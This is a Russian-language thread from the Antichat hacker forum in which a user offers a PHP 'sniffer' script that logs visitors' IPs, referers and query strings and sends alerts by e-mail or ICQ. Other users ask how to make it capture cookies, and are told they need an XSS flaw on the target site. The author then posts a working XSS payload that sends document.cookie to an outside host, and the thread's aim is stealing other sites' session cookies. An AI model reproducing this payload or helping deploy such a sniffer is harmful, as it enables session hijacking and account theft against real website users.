Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   [php] Http сниффер (https://forum.antichat.xyz/showthread.php?t=39102)

Developer 28.04.2007 17:32

[php] Http сниффер
 
Ранее уже как-то писал сниффер, но так и не доходили руки организовать ICQ уведомления.

В общем, кратко о скрипте:

+ Сниффер находится в одном файле (может работать не зависимо от других файлов)
+ Возможность вывода изображения
+ Возможность уведомления по E-Mail (Используется функция mail)
+ Возможность просмотра логов (sniffer.php?go=view)
+ Возможность уведомления по ICQ (Интеграция с классом WebIcqPro. Работает только на PHP5)

В архиве вы найдете файлы:
+ sniffer.php (сниффер)
+ WebIcqPro.class.php (Расширение для работы с ICQ от стороннего разработчика)
+ mygif.gif (Картинка для вывода)
+ log.txt (Лог-файл)

Перед тем, как заливать файл на сервер, откройте файл sniffer.php и отредактируйте мини-конфиг в начале файла ;)

http://slil.ru/24304415
Password: antichat

a1ex 28.04.2007 17:35

Ща заценим....

Developer 28.04.2007 17:37

Сообщения по ICQ приходят в таком виде:

Цитата:

[DD.MM.YYYY HH:II:SS] The new query on sniffer has arrived

TIME<|>PROXYIP<|>REALIP<|>PORT<|>REFERER<|>BROWSER <|>QUERY
ЗЫ: Можно написать .htaccess и положить его в папку с сниффером, для того чтобы можно было обращаться к снифферу на ".../sniffer.php", а ".../cool.gif".

grozglaz 29.04.2007 07:59

Я скачал архив, на каком хосте выложеть не в курсе???
З.Ы Если WebIcqPro.class.php удалить, сниф работать будет??

byblik 29.04.2007 08:27

Работает как часы (китайские) :)

grozglaz 29.04.2007 08:42

Када открываешь снифер, там текст вылазиет.
Объясните на пальцах, как chmode поставить, как писать и куда. ПлиZZZ

Developer 29.04.2007 09:28

Для работы необходимо залить только один файл на хост - sniffer.php. Лог-файл должен создаваться сам (Но для больших гарантий лучше его все-таки залить в ручную и поставить права 777).
Если изображение, указанное в конфиги не найдено - оно грузиться не будет, просто будет пустая страничка.
Если файл WebICQPro не найден - уведомления по ICQ рассылаться не будут.

Цитата:

Када открываешь снифер, там текст вылазиет.
Какой текст? При запросе на сниффер либо картинка либо ничего вообще.

Но если прописать в адресной строке .../sniffer.php?go=view, то откроется лог файл. Там данным пишутся в следующем формате:
Код:

TIME<|>PROXYIP<|>REALIP<|>PORT<|>REFERER<|>BROWSER<|>QUERY

grozglaz 29.04.2007 10:51

http://logsnif.narod.ru/sniffer.php я на народ кинул, но php вроде он не держит.
куда его кунуть?? На какой хост, дай адресс

grozglaz 29.04.2007 13:00

Фсёёё Работает, а как сделать что бы куки сохранял тоже, оч надо. Молодца!!

Fr-Ron 29.04.2007 13:07

Чтобы снифер сохранял куки, нужно найти Xss на сайте, с которого кукис надо. Почитай статьи, иначе ничего не поймешь...

grozglaz 29.04.2007 14:14

Я в курсе про Хss, в сниффере просто функции куки сохранять нет

Gashik 29.04.2007 14:16

Попробовал ваш сниффер поставить но не удачно....что то он не отображает данные :mad: Конфиг я менял точнее файл sniffer.php В чём может быть проблема??

grozglaz 29.04.2007 14:57

У мя всё работае, поменяй тока е маил, и всё, размести на хосте где php работает. У мя тоже с начало не получилось, а ща ок.
З.Ы Добавь куки, плиZZZ

Developer 29.04.2007 20:03

Причем тут куки? :) Куки нада передовать в строку запроса.

grozglaz 30.04.2007 03:26

Ну можно же вставить скрипт, найти Хss вставить ссылку на форуме, и куки записываются в лог.

Developer 05.05.2007 22:03

XSS на отправку кукиксов пишется примерно так:

Код:

<script>img = new Image(); img.src = "http://mysite.com/sniffer.gif?" + document.cookie;</script>

Developer 05.05.2007 22:04

Докажи, что бывают ситуации, что нужно записать в файл $_cookie и я добавлю эту опцию :)))

Developer 10.05.2007 20:47

Ммм.. А если фреймом открыть, куки будут видны?

ENFIX 10.05.2007 21:04

Перезалейте ктонить плз

@ps1k 10.05.2007 22:29

Up

перезалейте плз, немогу скачать

Developer 11.05.2007 19:23

Кто скачал, пусть перезальет, а то я куда-то удалил наработки :)

almaz 03.12.2007 14:49

Пожалуйста перезалете это сниффер...


Время: 13:24